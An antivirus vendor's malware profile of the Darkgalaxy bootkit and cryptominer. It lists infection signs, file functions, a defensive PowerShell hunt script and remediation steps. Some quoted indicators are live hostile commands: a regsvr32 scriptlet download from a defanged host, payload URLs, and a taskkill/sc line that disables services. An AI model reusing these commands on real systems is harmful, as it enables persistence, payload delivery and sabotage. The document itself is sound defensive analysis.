General Explanation
Type: Rootkit
Degree of destruction: high
Prevalence: average
Exploited vulnerabilities: Brute force, EternalBlue
What is a Rootkit?
Rootkits tamper with the operation of the OS kernel. These changes can hide the activity of files, processes, internal Windows services and so on; the malware may also connect to a remote server and attempt to update its files without the user noticing. Typical rootkit activities are modifying the system MBR and installing malicious drivers or altering the way legitimate drivers behave.
What is Darkgalaxy malware?
This malware, which appeared with the goal of mining cryptocurrency, carries out malicious activities on the victim's system and network by downloading and using various tools. Its most important activities are downloading new versions and updates of its main files, stealing information, mining cryptocurrency, changing the DNS settings, and running the Mirai botnet on the victim's network. Besides client systems, it also affects IoT devices.
Technical Explanation
Darkgalaxy is a miner and a type of bootkit: it writes its malicious code into the MBR, so the initial stage of the malware runs before the OS boots. It also creates two WMI objects that download and execute further malicious files.
Signs of infection
- Execution of Ismm.exe, which is used for mining
- Scheduled task files named Mysa1, Mysa2, etc. in %Windir%\System32\Tasks
- Two WMI objects named youmm4**** and youmm3**** under the root\cimv2 and root\subscription namespaces
- The following value in the Run registry paths:
  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\start
  - HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\start
  - Data: regsvr32 /u /s /i:hxxp://js.0603bye.info:280/v.sct scrobj.dll
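The indicators above can be checked on a host with a short hunt script. The following PowerShell is an added example and is not Padvish's or the malware's code; it assumes an elevated session on a Windows host, reads the Run keys, scheduled tasks, WMI subscription objects and dropped-file paths named on this page, and returns each match as an object.

```powershell
# Added hunt script for the Darkgalaxy indicators listed on this page.
# Assumption: run in an elevated PowerShell on the host being checked.
$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Kind, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Indicator = $Kind; Detail = $Detail })
}

# 1. Run-key values that launch regsvr32 with a remote scriptlet via scrobj.dll
$runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip provider metadata (PSPath etc.)
        if ([string]$p.Value -match 'regsvr32.*/i:https?:.*scrobj\.dll') {
            Add-Finding 'RunKey' "$key\$($p.Name) = $($p.Value)"
        }
    }
}

# 2. Scheduled tasks named Mysa1, Mysa2, ... (stored under %Windir%\System32\Tasks)
Get-ScheduledTask -ErrorAction SilentlyContinue |
    Where-Object { $_.TaskName -like 'Mysa*' } |
    ForEach-Object { Add-Finding 'ScheduledTask' "$($_.TaskPath)$($_.TaskName)" }

# 3. WMI event filters/consumers named youmm3*/youmm4* in the two namespaces named above
foreach ($ns in 'root\subscription', 'root\cimv2') {
    foreach ($class in '__EventFilter', '__EventConsumer') {
        Get-CimInstance -Namespace $ns -ClassName $class -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -like 'youmm*' } |
            ForEach-Object { Add-Finding "WMI:$ns\$class" $_.Name }
    }
}

# 4. Dropped files at the paths this page attributes to the malware
$paths = 'system\downs.exe', 'system\cab.exe', 'inf\msief.exe', 'debug\item.dat',
         'system\my1.bat', 'debug\lsmosee.exe', 'help\lsmosee.exe'
foreach ($rel in $paths) {
    $full = Join-Path $env:windir $rel
    if (Test-Path -LiteralPath $full) { Add-Finding 'File' $full }
}

if ($findings.Count -eq 0) { 'No Darkgalaxy indicators found.' }
else { $findings | Format-Table -AutoSize }
```

A clean host prints only the "no indicators" line; on a hit, the object list can be piped to Export-Csv for the incident record.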
Function of the malware's main files:
Analysing the WMI objects the malware creates reveals its distribution and execution procedure. Initially, the malware attempts to download its main files from the following addresses:
- hxxp://173.247.239.186/ok.exe
- hxxp://173.247.239.186/upsupx.exe
- hxxp://173.247.239.186/u.exe
These addresses change from time to time.
Max.exe or ok.exe file:
Responsible for modifying the MBR of the victim's system disk.
upsupx.exe file:
It downloads a file named xpdown.dat, whose content is the download address of the malware's bitcoin file.
U.exe file:
It changes the system DNS servers to 233.5.5.5 as the preferred DNS server and 8.8.8.8 as the alternate DNS server.
| Name and path of the malicious file | Function |
|---|---|
| %Windir%\system\downs.exe | Changes the file access permissions of the malware's chosen files on the system |
| %Windir%\system\cab.exe | Malware update file |
| %Windir%\inf\msief.exe | Mirai botnet executor |
| %Windir%\debug\item.dat | Malware service |
| %Windir%\system\my1.bat | up.txt file downloader |
After downloading the above files, according to its WMI code, the malware attempts to stop the processes of other miner malware on the system, such as Noutrino, Bitminer, etc., so that it can carry out its own malicious actions undisturbed. Via WMI it also kills processes named svchost.exe, wininit.exe, csrss.exe, WUDFHosts.exe, services.exe and taskhost.exe that run from a path other than their legitimate one.
Also, when updating, it removes the signs of infection created by previous versions. This malware also stops the AnyDesk service (the service of the AnyDesk remote-access application).
Since the malware's miner file is created on the victim's system as ismosee.exe, it removes all existing files at the %Windir%\debug\lsmosee.exe and %Windir%\help\lsmosee.exe paths in order to replace the old version with the new one.
It removes scheduled tasks such as WindowsUpdate1, WindowsUpdate3, Windows_Update, Update, Update2, Update3, window unit, System Security Check, AdobeFlashPlayer, etc.
To keep the system from being infected by other malware and to prevent any interference with mining, the malware closes the ports used for file transfer, such as ports 445 and 139, and then defines a new IPsec policy named win, so that only the party it chooses can connect to this system.
These filters are not applied on the XP OS, which the malware checks for beforehand. Next, it disables SMBDeviceEnabled through the registry.
up.txt file:
This file collects system information using PowerShell code, including: public IP, local IP, resource usage of processes, file path and command line of the running processes, OS type and version, hard disk capacity, and the system username, domain and password (obtained with the mimikatz tool). It stores them in a file and sends it to the malware server.
msief.exe file:
- Mirai botnet executor
- Disabling specific services:
  - %Windir%\system32\cmd.exe /c taskkill /f /im CSRS.exe&sc stop netprofm&sc config netprofm start= disabled&sc stop NlaSvc&sc config NlaSvc start=disabled
- Creating a service named xWinWpdSrv
- Using the masscan tool to scan for ports 445, 80 and 8000
- Spreading the malware via brute force
The malware also uses csrc.exe to exploit the EternalBlue vulnerability on other clients and create a backdoor on them.
How to deal with it and disinfect the system
Padvish antivirus detects this malware and removes it from the system. To prevent possible infections by malware that uses the EternalBlue vulnerability, it is recommended to apply Microsoft's security patch MS17-010. The IPS component of Padvish antivirus detects attempts to exploit this vulnerability and prevents them from reaching the victim's system.